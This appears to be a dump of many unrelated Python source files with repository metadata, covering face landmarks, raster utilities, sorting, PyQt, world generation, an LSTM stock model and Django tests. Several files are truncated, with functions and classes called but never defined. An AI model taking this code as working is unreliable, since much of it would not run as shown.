b0e2cf5bd2ba70f93247b07879264830fda0661a | 856 | py | Python | generate_landmarks.py | PandaWhoCodes/chutya_rating | 88f73e37c517c1d68ebf518b40cf93667f39991b | [
"MIT"
] | null | null | null | generate_landmarks.py | PandaWhoCodes/chutya_rating | 88f73e37c517c1d68ebf518b40cf93667f39991b | [
"MIT"
] | null | null | null | generate_landmarks.py | PandaWhoCodes/chutya_rating | 88f73e37c517c1d68ebf518b40cf93667f39991b | [
"MIT"
] | null | null | null | import sys
import os
import dlib
import glob
from skimage import io
predictor_path = "data/shape_predictor_68_face_landmarks.dat"
faces_folder_path = "data/pics"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
my_glob = glob.glob(os.path.join(faces_folder_path, "*.jpg"))
my_glob.sort(key=sortKeyFunc)
print(my_glob)
for f in my_glob:
print("Processing file: {}".format(f))
img = io.imread(f)
dets = detector(img, 1)
for k, d in enumerate(dets):
shape = predictor(img, d)
file_write = ""
for i in range(0, 68):
file_write += str(shape.part(i).x) + ", " + str(shape.part(i).y) + ", "
with open("data/landmarks.txt", "a") as f:
f.write(file_write)
f.write("\n")
| 25.939394 | 83 | 0.647196 |
b0e46a90af345235275bf125d7191b762e1c076e | 6,530 | py | Python | geoutils/misc.py | erikmannerfelt/GeoUtils | 96a044f7cca73f936e5b245a5e99e0d2102d279f | [
"BSD-3-Clause"
] | 23 | 2020-11-11T11:00:45.000Z | 2022-03-28T07:06:56.000Z | geoutils/misc.py | erikmannerfelt/GeoUtils | 96a044f7cca73f936e5b245a5e99e0d2102d279f | [
"BSD-3-Clause"
] | 223 | 2020-11-11T14:34:51.000Z | 2022-03-31T14:14:58.000Z | geoutils/misc.py | erikmannerfelt/GeoUtils | 96a044f7cca73f936e5b245a5e99e0d2102d279f | [
"BSD-3-Clause"
] | 14 | 2021-02-19T09:57:46.000Z | 2022-03-21T09:49:12.000Z | """Miscellaneous functions, mainly for testing."""
from __future__ import annotations
import functools
import warnings
import numpy as np
import rasterio as rio
import geoutils
from geoutils._typing import ArrayLike
from geoutils.georaster import Raster, RasterType
def array_equal(
array1: RasterType | ArrayLike,
array2: RasterType | ArrayLike,
equal_nan: bool = True,
tolerance: float = 0.0,
) -> bool:
"""
Check if two arrays or Rasters are equal.
This function mirrors (and partly uses) 'np.array_equal' with these exceptions:
1. Different dtypes are okay as long as they are equal (e.g. '1 == 1.0' is True)
2. Rasters are directly comparable.
3. masked_array masks are respected.
4. A tolerance argument is added.
5. The function works with numpy<=1.18.
:param array1: The first array-like object to compare.
:param array2: The second array-like object to compare.
:param equal_nan: Whether to compare NaNs as equal ('NaN == NaN' is True)
:param tolerance: The maximum allowed summed difference between the arrays.
Examples:
Any object that can be parsed as an array can be compared.
>>> arr1 = [1, 2, 3]
>>> arr2 = np.array([1., 2., 3.])
>>> array_equal(arr1, arr2)
True
Nans are equal by default, but can be disabled with 'equal_nan=False'
>>> arr3 = np.array([1., 2., np.nan])
>>> array_equal(arr1, arr3)
False
>>> array_equal(arr3, arr3.copy())
True
>>> array_equal(arr3, arr3, equal_nan=False)
False
The equality tolerance can be set with the 'tolerance' argument (defaults to 0).
>>> arr4 = np.array([1., 2., 3.1])
>>> array_equal(arr1, arr4)
False
>>> array_equal(arr1, arr4, tolerance=0.2)
True
Masks in masked_arrays are respected.
>>> arr5 = np.ma.masked_array(arr1, [False, False, True])
>>> array_equal(arr1, arr5)
False
>>> array_equal(arr3, arr5)
True
>>> array_equal(arr3, arr5, equal_nan=False)
False
"""
arrays: list[np.ndarray] = []
strings_compared = False # Flag to handle string arrays instead of numeric
# Convert both inputs to numpy ndarrays
for arr in array1, array2:
if any(s in np.dtype(type(np.asanyarray(arr)[0])).name for s in ("<U", "str")):
strings_compared = True
if isinstance(arr, Raster): # If a Raster subclass, take its data. I don't know why mypy complains here!
arr = arr.data # type: ignore
if isinstance(arr, np.ma.masked_array): # If a masked_array, replace the masked values with nans
if "float" not in np.dtype(arr.dtype).name:
arr = arr.astype(float)
arrays.append(arr.filled(np.nan)) # type: ignore
else:
arrays.append(np.asarray(arr))
if np.shape(arrays[0]) != np.shape(arrays[1]):
return False
if strings_compared: # If they are strings, the tolerance/nan handling is irrelevant.
return bool(np.array_equal(arrays[0], arrays[1]))
diff = np.diff(arrays, axis=0)
if "float" in np.dtype(diff.dtype).name and np.any(~np.isfinite(diff)):
# Check that the nan-mask is equal. If it's not, or nans are not allowed at all, return False
if not equal_nan or not np.array_equal(np.isfinite(arrays[0]), np.isfinite(arrays[1])):
return False
return bool(np.nansum(np.abs(diff)) <= tolerance)
def deprecate(removal_version: str | None = None, details: str | None = None): # type: ignore
"""
Trigger a DeprecationWarning for the decorated function.
:param func: The function to be deprecated.
:param removal_version: Optional. The version at which this will be removed.
If this version is reached, a ValueError is raised.
:param details: Optional. A description for why the function was deprecated.
:triggers DeprecationWarning: For any call to the function.
:raises ValueError: If 'removal_version' was given and the current version is equal or higher.
:returns: The decorator to decorate the function.
"""
return deprecator_func
def resampling_method_from_str(method_str: str) -> rio.warp.Resampling:
"""Get a rasterio resampling method from a string representation, e.g. "cubic_spline"."""
# Try to match the string version of the resampling method with a rio Resampling enum name
for method in rio.warp.Resampling:
if str(method).replace("Resampling.", "") == method_str:
resampling_method = method
break
# If no match was found, raise an error.
else:
raise ValueError(
f"'{method_str}' is not a valid rasterio.warp.Resampling method. "
f"Valid methods: {[str(method).replace('Resampling.', '') for method in rio.warp.Resampling]}"
)
return resampling_method
| 38.187135 | 113 | 0.622971 |
b0e7cd1cacbdf9713f6574f513c54cc6fc8be57b | 1,860 | py | Python | sorting/merge_sort.py | matuzalemmuller/algoritmos | 138e7c9747879a58fab48908541c175b8653da5c | [
"MIT"
] | null | null | null | sorting/merge_sort.py | matuzalemmuller/algoritmos | 138e7c9747879a58fab48908541c175b8653da5c | [
"MIT"
] | null | null | null | sorting/merge_sort.py | matuzalemmuller/algoritmos | 138e7c9747879a58fab48908541c175b8653da5c | [
"MIT"
] | null | null | null | # UFSC - Campus Trindade
# PPGEAS - Introducao a Algoritmos
# Matuzalem Muller dos Santos
# 2019/1
# Commented code is for calculating algorithm completixy and printing variables
from random import randint
import time
import sys
if __name__ == '__main__':
array = []
random_number = 0
try:
number_of_elements = int(sys.argv[1])
except:
number_of_elements = 10
for i in range(0, number_of_elements):
random_number = randint(1, 9_999_999_999)
array.append(random_number)
# print(array)
start_time = time.time()
# array, n = merge_sort(array)
array = merge_sort(array)
running_time = time.time() - start_time
# print(array)
# print(n)
print(running_time) | 26.956522 | 79 | 0.58172 |
b0e7ec352bf4d97e4861749ed21422b37bbf8b42 | 2,239 | py | Python | binsync/data/struct.py | zachsez/binsync | 39a53a84c640314adbf50e612177c4a56c43542c | [
"MIT"
] | 40 | 2021-05-09T03:24:46.000Z | 2022-03-31T23:01:50.000Z | binsync/data/struct.py | zachsez/binsync | 39a53a84c640314adbf50e612177c4a56c43542c | [
"MIT"
] | 53 | 2021-05-27T07:53:58.000Z | 2022-03-27T21:35:26.000Z | binsync/data/struct.py | zachsez/binsync | 39a53a84c640314adbf50e612177c4a56c43542c | [
"MIT"
] | 10 | 2021-05-13T22:09:38.000Z | 2022-03-31T23:51:27.000Z | import toml
from typing import List, Dict
from .artifact import Artifact
| 23.568421 | 102 | 0.590442 |
b0e84025ba8edc34831e545492abd9cc1b7a33c6 | 9,070 | py | Python | __init__.py | itsmepvr/list_images_to_excel | a4da3948a289c91cbcab90980364e989af7f1118 | [
"MIT"
] | null | null | null | __init__.py | itsmepvr/list_images_to_excel | a4da3948a289c91cbcab90980364e989af7f1118 | [
"MIT"
] | null | null | null | __init__.py | itsmepvr/list_images_to_excel | a4da3948a289c91cbcab90980364e989af7f1118 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Author: Venkata Ramana P
<github.com/itsmepvr>
List files to an excel sheet
"""
import os, glob
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QMessageBox
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from os.path import expanduser
import xlsxwriter
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 43.190476 | 110 | 0.661632 |
b0e8a0baacae15b6d64e13be86210039b28af7e3 | 1,215 | py | Python | exception.py | a2gs/pythonStudy | e790e223a05fd50a5bcaf1240ef24ff60f361cdd | [
"MIT"
] | null | null | null | exception.py | a2gs/pythonStudy | e790e223a05fd50a5bcaf1240ef24ff60f361cdd | [
"MIT"
] | null | null | null | exception.py | a2gs/pythonStudy | e790e223a05fd50a5bcaf1240ef24ff60f361cdd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def func(b):
if(b == 1):
raise myExcept_1
elif(b == 2):
raise myExcept_2
elif(b == 3):
return
try:
func(1)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done1\n----------------------------------------')
try:
func(2)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done2\n----------------------------------------')
try:
func(3)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
| 19.918033 | 56 | 0.626337 |
b0e8e97e17556ae476f654f72b30433601cb2273 | 564 | py | Python | datachecker/processors/conditionals.py | jayclassless/datachecker | dd42b95f87eaaca428595fe5da639f9a710afba8 | [
"MIT"
] | null | null | null | datachecker/processors/conditionals.py | jayclassless/datachecker | dd42b95f87eaaca428595fe5da639f9a710afba8 | [
"MIT"
] | null | null | null | datachecker/processors/conditionals.py | jayclassless/datachecker | dd42b95f87eaaca428595fe5da639f9a710afba8 | [
"MIT"
] | null | null | null | from ..errors import DataRequiredError, ShortCircuitSignal
from ..util import processor
__all__ = (
'required',
'optional',
)
| 18.8 | 58 | 0.64539 |
b0eca7b772b3e9b8c51b6d9de56d789e01ceaffc | 226 | py | Python | python/args/multiple.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | python/args/multiple.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | python/args/multiple.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys,argparse
parser = argparse.ArgumentParser()
parser.add_argument('-foo', nargs='+', help='foo values', required=False)
args = parser.parse_args()
for foo in args.foo:
print("Foo: ",foo) | 20.545455 | 73 | 0.70354 |
b0ed0165784914f7dc8282f6f368dd72c90b41f2 | 1,594 | py | Python | src/parent_class/ParentPluralList.py | jameskabbes/parent_class | cecf938a2f9c66d8914967098b2064526bbec1c7 | [
"MIT"
] | null | null | null | src/parent_class/ParentPluralList.py | jameskabbes/parent_class | cecf938a2f9c66d8914967098b2064526bbec1c7 | [
"MIT"
] | null | null | null | src/parent_class/ParentPluralList.py | jameskabbes/parent_class | cecf938a2f9c66d8914967098b2064526bbec1c7 | [
"MIT"
] | null | null | null | from parent_class import ParentPlural
from typing import List
if __name__ == '__main__':
a = ParentPluralList()
a.print_atts() | 21.835616 | 95 | 0.527604 |
b0ed1693b1a77aee2f28b941c3d753890e7d9408 | 1,454 | py | Python | prototypes/harvesters/cxidb_harvester.py | materials-data-facility/connect | 9ec5b61750bf6fa579bf3ec122f31880d3c049b8 | [
"Apache-2.0"
] | 1 | 2019-09-13T18:35:56.000Z | 2019-09-13T18:35:56.000Z | prototypes/harvesters/cxidb_harvester.py | materials-data-facility/connect_server | 9ec5b61750bf6fa579bf3ec122f31880d3c049b8 | [
"Apache-2.0"
] | 15 | 2018-11-01T18:08:11.000Z | 2021-12-06T17:55:03.000Z | prototypes/harvesters/cxidb_harvester.py | materials-data-facility/connect | 9ec5b61750bf6fa579bf3ec122f31880d3c049b8 | [
"Apache-2.0"
] | 1 | 2020-11-30T17:02:41.000Z | 2020-11-30T17:02:41.000Z | import requests
from json import dump
import os
from shutil import rmtree
from tqdm import tqdm
#Collects available data from CXIDB and saves to the given directory
#out_dir: The path to the directory (which will be created) for the data files
#existing_dir:
# -1: Remove out_dir if it exists
# 0: Error if out_dir exists (Default)
# 1: Overwrite files in out_dir if there are path collisions
#verbose: Print status messages? Default False
| 36.35 | 82 | 0.643741 |
b0ed5b6a6f6876d6d3b9b9b973debc09d4041302 | 136 | py | Python | bot/permissions.py | Yakov-Varnaev/Epicker_bot | da077e0bcfbd41a2efaed74d71e7c4c818b842c0 | [
"MIT"
] | null | null | null | bot/permissions.py | Yakov-Varnaev/Epicker_bot | da077e0bcfbd41a2efaed74d71e7c4c818b842c0 | [
"MIT"
] | null | null | null | bot/permissions.py | Yakov-Varnaev/Epicker_bot | da077e0bcfbd41a2efaed74d71e7c4c818b842c0 | [
"MIT"
] | null | null | null | from aiogram import types
import config
| 17 | 48 | 0.786765 |
b0f062298bedb55fde1aeecf88bc32677fffabc9 | 127 | py | Python | ssshare/__init__.py | centaur679/ShadowSocksShare | 41f85e9a0adc1322fd8f254a1c1a5360d228507a | [
"Apache-2.0"
] | 2,341 | 2019-03-04T05:41:12.000Z | 2022-03-31T11:30:40.000Z | ssshare/__init__.py | centaur679/ShadowSocksShare | 41f85e9a0adc1322fd8f254a1c1a5360d228507a | [
"Apache-2.0"
] | 50 | 2019-03-24T01:35:13.000Z | 2021-09-09T22:59:15.000Z | ssshare/__init__.py | centaur679/ShadowSocksShare | 41f85e9a0adc1322fd8f254a1c1a5360d228507a | [
"Apache-2.0"
] | 780 | 2019-03-04T07:33:37.000Z | 2022-03-22T23:32:53.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)
app.config.from_object("config")
| 15.875 | 32 | 0.685039 |
b0f238f39a9f9a11e1383c07dd66cb298f4de952 | 21,160 | py | Python | worldengine/cli/main.py | stefan-feltmann/lands | b2f1fc3aab4895763160a135d085a17dceb5f58e | [
"MIT"
] | null | null | null | worldengine/cli/main.py | stefan-feltmann/lands | b2f1fc3aab4895763160a135d085a17dceb5f58e | [
"MIT"
] | null | null | null | worldengine/cli/main.py | stefan-feltmann/lands | b2f1fc3aab4895763160a135d085a17dceb5f58e | [
"MIT"
] | null | null | null | import sys
from argparse import ArgumentParser
import os
import pickle
import random
import worldengine.generation as geo
from worldengine.common import array_to_matrix, set_verbose, print_verbose
from worldengine.draw import draw_ancientmap_on_file, draw_biome_on_file, draw_ocean_on_file, \
draw_precipitation_on_file, draw_grayscale_heightmap_on_file, draw_simple_elevation_on_file, \
draw_temperature_levels_on_file, draw_riversmap_on_file
from worldengine.plates import world_gen, generate_plates_simulation
from worldengine.step import Step
from worldengine.world import World
from worldengine.version import __version__
VERSION = __version__
OPERATIONS = 'world|plates|ancient_map|info'
SEA_COLORS = 'blue|brown'
STEPS = 'plates|precipitations|full'
def generate_plates(seed, world_name, output_dir, width, height,
num_plates=10):
"""
Eventually this method should be invoked when generation is called at
asked to stop at step "plates", it should not be a different operation
:param seed:
:param world_name:
:param output_dir:
:param width:
:param height:
:param num_plates:
:return:
"""
elevation, plates = generate_plates_simulation(seed, width, height,
num_plates=num_plates)
world = World(world_name, width, height, seed, num_plates, -1.0, "plates")
world.set_elevation(array_to_matrix(elevation, width, height), None)
world.set_plates(array_to_matrix(plates, width, height))
# Generate images
filename = '%s/plates_%s.png' % (output_dir, world_name)
# TODO calculate appropriate sea_level
sea_level = 1.0
draw_simple_elevation_on_file(world.elevation['data'], filename, width,
height, sea_level)
print("+ plates image generated in '%s'" % filename)
geo.center_land(world)
filename = '%s/centered_plates_%s.png' % (output_dir, world_name)
draw_simple_elevation_on_file(world.elevation['data'], filename, width,
height, sea_level)
print("+ centered plates image generated in '%s'" % filename)
# -------------------------------
if __name__ == "__main__":
main()
| 41.653543 | 98 | 0.57689 |
b0f3965138dd98bc050b860206e62e5235246cb0 | 1,432 | py | Python | poc-api-gateway/init-project.py | ronald-pineda/poc | b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3 | [
"Apache-2.0"
] | null | null | null | poc-api-gateway/init-project.py | ronald-pineda/poc | b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3 | [
"Apache-2.0"
] | null | null | null | poc-api-gateway/init-project.py | ronald-pineda/poc | b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import sys
import os
servicesFolder = sys.argv[1]
projectFolders = sys.argv[2].split(',')
# projectFolders = "project1 project2".split(' ')
# servicesFolderName = "/services"
srcFolders = "src src/main src/main/java src/main/resources src/test src/test/java src/test/resources".split(
' ')
currentPath = os.getcwd()
fullServicesFolder = currentPath + "/" + servicesFolder
create_project_folders(projectFolders)
| 30.468085 | 109 | 0.672486 |
b0f74b9d843423b3b2ee4eb76a8944598071e925 | 10,133 | py | Python | lstm.py | mustyoshi/scikit-ta | c2a8f4ce2deadaa13d8bd8891aabd096b397e330 | [
"MIT"
] | 1 | 2018-03-12T19:50:14.000Z | 2018-03-12T19:50:14.000Z | lstm.py | mustyoshi/scikit-ta | c2a8f4ce2deadaa13d8bd8891aabd096b397e330 | [
"MIT"
] | null | null | null | lstm.py | mustyoshi/scikit-ta | c2a8f4ce2deadaa13d8bd8891aabd096b397e330 | [
"MIT"
] | 1 | 2020-02-22T21:59:39.000Z | 2020-02-22T21:59:39.000Z | from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import rnn
import pandas as pd
import numpy as np
import random
import time
import os
import datetime
from tensorflow.python.client import timeline
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from sklearn.pipeline import Pipeline
import mods
#from . import ProductionPipe
if __name__ == "__main__":
# Training Parameters
device="/gpu:0"
learning_rate = .0001
batch_size = (20*5)
display_step = 10
timesteps = 1 # timesteps
num_classes = 2 # MNIST total classes (0-9 digits)
to_drop = ['Date','Time','Open','High','Low','Close','Volume',"Period_4_Lookforward_p1","Period_4_Lookforward_p2"]
to_bool = []
create = True
if(create):
#df = pd.read_csv('dhy.us.txt',names=["Date","Time","Open","High","Low","Close","Volume","Ope"])
df = pd.read_csv('bac.us.txt')
origs = df[['Close']].copy()
#df = pd.read_csv('combined.csv',header=None,names=["Open","High","Low","Close","Volume"])
prod_pipe = mods.CreatePipeline() #Pipeline([('ft1',ft1),('ft2',ft2),('ft3',ft3)])
df['Period_4_Lookforward_p1'] = (df['Close'].shift(-4).astype(float) > df['Close'].astype(float))
df['Period_4_Lookforward_p2'] =(np.min([df['Low'].shift(-n) for n in range(1,4)],axis=0) > (df['Close'].astype(float)*.99)) #np.amax([df['Close'].shift(-n).astype(float) for n in range(1,4)],axis=0) > df['Close']
df['Period_4_Lookforward'] = (df['Period_4_Lookforward_p1'].astype(bool) == True) & (df['Period_4_Lookforward_p2'].astype(bool) == True)
df = prod_pipe.transform(df)
#to_bool.append('Period_4_Lookforward')
#for b in to_bool:
# df[b] = df[b].astype(bool)
df = df.dropna()
df.drop(df.index[:32], inplace=True,errors="ignore")
#df.to_csv('Hours.csv',index=False)
#df = df.drop(to_drop,axis=1)
df = df.astype(float)
df.to_csv('Hours.csv',index=False,float_format="%.8g")
else:
df = pd.read_csv('Hours.csv')
print(sum(df['Period_4_Lookforward'].values),'total ups',sum(df['Period_4_Lookforward'].values)/len(df))
num_input = len(df.columns)-1
num_hidden =num_input*20 # int((num_input*num_input)//2) # hidden layer num of features
train = df[:int(len(df)*0.9)]
test = df[len(train):]
dfs = splitDataFrameIntoSmaller(train)
training_steps = len(dfs)*100
del dfs[-1]
random.shuffle(dfs)
dfs.append(test)
print(num_input,'inputs')
print(num_hidden,'nodes per layer')
print(len(dfs),'batches')
print(len(test),'test parts')
ind = 0
# Network Parameters
with tf.device(device):
# tf Graph input
X = tf.placeholder("float", [None, timesteps, num_input])
Y = tf.placeholder("float", [None, num_classes])
# Define weights
weights = {
'out': tf.Variable(tf.random_normal([num_hidden, num_classes]))
}
biases = {
'out': tf.Variable(tf.random_normal([num_classes]))
}
logits = RNN(X, weights, biases)
with tf.device("/cpu:0"):
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
logits=logits, labels=Y))
#optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
#optimizer = tf.train.AdagradOptimizer(learning_rate=learning_rate)
optimizer = tf.train.AdamOptimizer(learning_rate)
#optimizer = tf.train.FtrlOptimizer(learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model (with test logits, for dropout to be disabled)
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
y_p = tf.argmax(prediction, 1)
init = tf.global_variables_initializer()
# Initialize the variables (i.e. assign their default value)
test_len = len(dfs[-1])
test_data = dfs[-1]
closes = origs.loc[test_data.index].values
test_data.reset_index(drop=True,inplace=True)
test_true = test_data['Period_4_Lookforward'].values
test_label = np.array([test_data['Period_4_Lookforward'] == 0,test_data['Period_4_Lookforward'] == 1]).reshape((-1,2))
test_data = test_data.drop(['Period_4_Lookforward'],axis=1)
test_data = test_data.as_matrix()
test_data = test_data.reshape((-1, timesteps, num_input))
max_fails = 10
fails = 0
min_improv = .00000001
min_loss = 99
max_f1 = 0
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
config.intra_op_parallelism_threads=4
config.inter_op_parallelism_threads=4
with tf.Session(config=config) as sess:
# Run the initializer
sess.run(init)
start_time = time.time()
for step in range(1, training_steps+1):
batch_x= dfs[ind]
#print(len(batch_x),'rows')
ind = (ind + 1)%(len(dfs)-1)
y_true = batch_x['Period_4_Lookforward'].values
batch_y =np.array([batch_x['Period_4_Lookforward'] == 0,batch_x['Period_4_Lookforward'] == 1]).reshape((-1,2))
batch_x = batch_x.drop(['Period_4_Lookforward'],axis=1)
# Reshape data to get 28 seq of 28 elements
batch_x = batch_x.as_matrix()
batch_x = batch_x.reshape((batch_size, timesteps, num_input))
# Run optimization op (backprop)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})
# if(learning_rate > .0001):
# learning_rate = learning_rate/10
# optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
# train_op = optimizer.minimize(loss_op)
if step % display_step == 0 or step == 1:
# Calculate batch loss and accuracy
loss, acc,y_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: batch_x,
Y: batch_y})
loss2, acc2,test_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: test_data,
Y: test_label})
test_f1 = f1_score(test_true,test_pred)
print("Step " + "{:07d}".format(step) + ",L= " + \
"{:.6f}".format(loss) + ",Tr=" + \
"{:.3f}".format(acc) + ",Te=" + \
"{:.3f}".format(acc2) + ",F1(Tr)={:.3f}".format(f1_score(y_true,y_pred)) + \
",F1(Te)={:.8f}".format(test_f1))
if(loss < (min_loss-min_improv) or test_f1 > max_f1):
min_loss = loss
fails = 0
max_f1 = max(max_f1,test_f1)
else:
fails = fails + 1
if(fails > max_fails):
print('Ended early due to failure to improve')
break
duration = time.time() - start_time
print("\nOptimization Finished in {:.4f}s ({:0.8f} per step)\n\tMax of {:.4f}".format(duration,duration/step,max_f1))
# Calculate accuracy for 128 mnist test images
print("Final Testing Accuracy {:0.4f}%".format(f1_score(test_true,sess.run(y_p, feed_dict={X: test_data, Y: test_label}))))
last_price = 0
gain = 1
ind = 0
min_gain = 1
max_gain = 1
for row in test_data:
output = sess.run(y_p,feed_dict={X:[row]})[0]
if(output == 1):
if(last_price == 0):
last_price = closes[ind]
if(closes[ind] < last_price):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
else:
if(last_price != 0):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
ind = ind + 1
print(ind,"rows gives",gain)
print(min_gain," | ",max_gain)
#saver = tf.train.Saver()
#saver.save(sess, "D:\\dev\\forex_17\\model.ckpt")
| 42.936441 | 220 | 0.589954 |
b0f85d4de8f913a7c50b0d59c38e3f8dc18c049b | 2,375 | py | Python | src/napari_live_recording/__init__.py | jethro33/napari-live-recording | 6c3fcc33bd18cd090e3f89971b630d1800e29e4d | [
"MIT"
] | 7 | 2021-10-11T17:45:33.000Z | 2022-02-07T16:10:42.000Z | src/napari_live_recording/__init__.py | jethro33/napari-live-recording | 6c3fcc33bd18cd090e3f89971b630d1800e29e4d | [
"MIT"
] | 2 | 2021-11-01T09:00:11.000Z | 2022-01-24T16:21:05.000Z | src/napari_live_recording/__init__.py | jethro33/napari-live-recording | 6c3fcc33bd18cd090e3f89971b630d1800e29e4d | [
"MIT"
] | null | null | null | from napari.viewer import Viewer
import napari_live_recording.devices as devices
from napari_live_recording.widgets import CameraSelection
from napari_live_recording.control import Controller
from qtpy.QtWidgets import QWidget, QFormLayout, QGroupBox | 45.673077 | 105 | 0.663579 |
b0f8a636893a665d94b32f86e052882874326b1a | 4,277 | py | Python | Chapter08/inceptionV3.py | wikibook/deep-learning-reference | 18d2ca2ded4256b2ddbac6e76d57531ca13e6e30 | [
"MIT"
] | 2 | 2020-02-13T05:45:20.000Z | 2020-04-11T05:58:02.000Z | Chapter08/inceptionV3.py | wikibook/deep-learning-reference | 18d2ca2ded4256b2ddbac6e76d57531ca13e6e30 | [
"MIT"
] | null | null | null | Chapter08/inceptionV3.py | wikibook/deep-learning-reference | 18d2ca2ded4256b2ddbac6e76d57531ca13e6e30 | [
"MIT"
] | null | null | null | # Deep Learning Quick Reference Chapter 8: Transfer Learning
# Mike Bernico <mike.bernico@gmail.com>
# seed random number generators before importing keras
import numpy as np
np.random.seed(42)
import tensorflow as tf
tf.set_random_seed(42)
from keras.applications.inception_v3 import InceptionV3
from keras.models import Model
from keras.layers import Dense, GlobalAveragePooling2D
from keras.callbacks import TensorBoard, EarlyStopping, CSVLogger, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import SGD
import os
import argparse
if __name__ == "__main__":
main()
| 34.491935 | 133 | 0.710545 |
b0f8d8e1a99343fc9166ec575752cd7be6e45cee | 827 | py | Python | Pytorch/5-CNN/nn_Sequential.py | pengchenyu111/PaperCodeReplication | 7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a | [
"Apache-2.0"
] | null | null | null | Pytorch/5-CNN/nn_Sequential.py | pengchenyu111/PaperCodeReplication | 7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a | [
"Apache-2.0"
] | null | null | null | Pytorch/5-CNN/nn_Sequential.py | pengchenyu111/PaperCodeReplication | 7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a | [
"Apache-2.0"
] | null | null | null | import torch
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.tensorboard import SummaryWriter
tudui = Tudui()
print(tudui)
input = torch.ones((64, 3, 32, 32))
output = tudui(input)
print(output.shape)
writer = SummaryWriter("./logs")
writer.add_graph(tudui, input)
writer.close()
| 22.972222 | 67 | 0.584039 |
b0fb6f704b8d712fad268b480c2d25cc8bc409f5 | 1,232 | py | Python | src/brewlog/utils/query.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 3 | 2019-03-11T04:30:06.000Z | 2020-01-26T03:21:52.000Z | src/brewlog/utils/query.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 23 | 2019-02-06T20:37:37.000Z | 2020-06-01T07:08:35.000Z | src/brewlog/utils/query.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | null | null | null | from typing import Optional
from flask import url_for
from flask_sqlalchemy import BaseQuery
from ..ext import db
from ..models import Brew, BrewerProfile
def public_or_owner(query: BaseQuery, user: Optional[BrewerProfile]) -> BaseQuery:
"""Filter Brew query of all non-accessible objects.
:param query: query over Brew objects
:type query: BaseQuery
:param user: actor object, may be None
:type user: Optional[BrewerProfile]
:return: filtered query
:rtype: BaseQuery
"""
if user is not None:
query = query.filter(
db.or_(
BrewerProfile.id == user.id,
db.and_(BrewerProfile.is_public.is_(True), Brew.is_public.is_(True))
)
)
else:
query = query.filter(
BrewerProfile.is_public.is_(True), Brew.is_public.is_(True)
)
return query
| 29.333333 | 84 | 0.649351 |
b0fda5ff40de8e081dd602a278f08974ff524613 | 11,355 | py | Python | adventures/bucketlist/tests/test_api.py | lakivisi-zz/adventures | f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5 | [
"MIT"
] | null | null | null | adventures/bucketlist/tests/test_api.py | lakivisi-zz/adventures | f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5 | [
"MIT"
] | null | null | null | adventures/bucketlist/tests/test_api.py | lakivisi-zz/adventures | f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5 | [
"MIT"
] | 1 | 2021-01-14T21:27:32.000Z | 2021-01-14T21:27:32.000Z | from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from bucketlist.models import Bucketlist, Item
